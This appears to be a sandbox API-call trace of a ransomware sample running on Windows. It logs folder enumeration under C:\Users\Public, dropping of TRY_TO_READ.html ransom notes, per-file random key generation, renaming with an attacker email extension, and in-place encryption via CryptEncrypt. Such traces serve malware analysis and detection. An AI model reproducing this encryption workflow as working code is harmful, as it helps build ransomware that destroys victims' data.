	[0100.835] FindNextFileW (in: hFindFile=0x5da9b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.836] FindNextFileW (in: hFindFile=0x5da9b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.836] FindNextFileW (in: hFindFile=0x5da9b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.836] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Libraries\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da9f0
	[0100.836] FindNextFileW (in: hFindFile=0x5da9f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.836] FindNextFileW (in: hFindFile=0x5da9f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.836] FindNextFileW (in: hFindFile=0x5da9f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1
	[0100.836] FindNextFileW (in: hFindFile=0x5da9f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.836] FindNextFileW (in: hFindFile=0x5da9f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.836] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.836] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.836] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms", dwFileAttributes=0x80) returned 1
	[0100.837] lstrlenW (lpString="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 48
	[0100.837] GetProcessHeap () returned 0x540000
	[0100.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc6) returned 0x5919d0
	[0100.837] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" | out: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms"
	[0100.837] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.837] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.839] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4
	[0100.839] GetProcessHeap () returned 0x540000
	[0100.839] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.839] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=876) returned 1
	[0100.839] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x36c
	[0100.839] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.840] GetProcessHeap () returned 0x540000
	[0100.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.840] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.840] WriteFile (in: hFile=0x4e4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.842] WriteFile (in: hFile=0x4e4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.843] WriteFile (in: hFile=0x4e4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.843] ReadFile (in: hFile=0x4e4, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x36c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x36c, lpOverlapped=0x0) returned 1
	[0100.843] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=-876, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.843] WriteFile (in: hFile=0x4e4, lpBuffer=0x5fb700*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb700*, lpNumberOfBytesWritten=0x3a1f778*=0x36c, lpOverlapped=0x0) returned 1
	[0100.843] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.843] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.843] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.843] lstrlenW (lpString="C:\\\\Users\\Public\\Libraries\\desktop.ini") returned 38
	[0100.843] GetProcessHeap () returned 0x540000
	[0100.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb2) returned 0x5a2048
	[0100.843] lstrcpyW (in: lpString1=0x5a2048, lpString2="C:\\\\Users\\Public\\Libraries\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini") returned="C:\\\\Users\\Public\\Libraries\\desktop.ini"
	[0100.843] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.843] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.845] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\libraries\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4
	[0100.845] GetProcessHeap () returned 0x540000
	[0100.845] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x540000) returned 1
	[0100.845] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=88) returned 1
	[0100.845] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x58
	[0100.845] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.845] GetProcessHeap () returned 0x540000
	[0100.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.846] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.846] WriteFile (in: hFile=0x4e4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.847] WriteFile (in: hFile=0x4e4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.847] WriteFile (in: hFile=0x4e4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.847] ReadFile (in: hFile=0x4e4, lpBuffer=0x5695e8, nNumberOfBytesToRead=0x58, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5695e8*, lpNumberOfBytesRead=0x3a1f778*=0x58, lpOverlapped=0x0) returned 1
	[0100.847] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=-88, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.847] WriteFile (in: hFile=0x4e4, lpBuffer=0x569648*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x569648*, lpNumberOfBytesWritten=0x3a1f778*=0x58, lpOverlapped=0x0) returned 1
	[0100.848] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Music\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daa30
	[0100.848] FindNextFileW (in: hFindFile=0x5daa30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.849] FindNextFileW (in: hFindFile=0x5daa30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.849] FindNextFileW (in: hFindFile=0x5daa30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1
	[0100.850] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\music\\sample music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8
	[0100.853] FindNextFileW (in: hFindFile=0x5daa30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c90530, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.853] FindNextFileW (in: hFindFile=0x5daa30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c90530, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.853] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.853] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.853] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.853] lstrlenW (lpString="C:\\\\Users\\Public\\Music\\desktop.ini") returned 34
	[0100.853] GetProcessHeap () returned 0x540000
	[0100.853] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xaa) returned 0x599528
	[0100.853] lstrcpyW (in: lpString1=0x599528, lpString2="C:\\\\Users\\Public\\Music\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini") returned="C:\\\\Users\\Public\\Music\\desktop.ini"
	[0100.853] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.853] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.856] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8
	[0100.856] GetProcessHeap () returned 0x540000
	[0100.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x599528 | out: hHeap=0x540000) returned 1
	[0100.856] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=380) returned 1
	[0100.856] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x17c
	[0100.856] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.856] GetProcessHeap () returned 0x540000
	[0100.856] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.856] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.856] WriteFile (in: hFile=0x4e8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.857] WriteFile (in: hFile=0x4e8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.857] WriteFile (in: hFile=0x4e8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.857] ReadFile (in: hFile=0x4e8, lpBuffer=0x56b448, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesRead=0x3a1f778*=0x17c, lpOverlapped=0x0) returned 1
	[0100.857] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.858] WriteFile (in: hFile=0x4e8, lpBuffer=0x597dc8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesWritten=0x3a1f778*=0x17c, lpOverlapped=0x0) returned 1
	[0100.858] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Pictures\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daa70
	[0100.858] FindNextFileW (in: hFindFile=0x5daa70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca84b130, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.858] FindNextFileW (in: hFindFile=0x5daa70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.858] FindNextFileW (in: hFindFile=0x5daa70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1
	[0100.858] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\pictures\\sample pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec
	[0100.862] FindNextFileW (in: hFindFile=0x5daa70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca84b130, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca84b130, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c90530, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
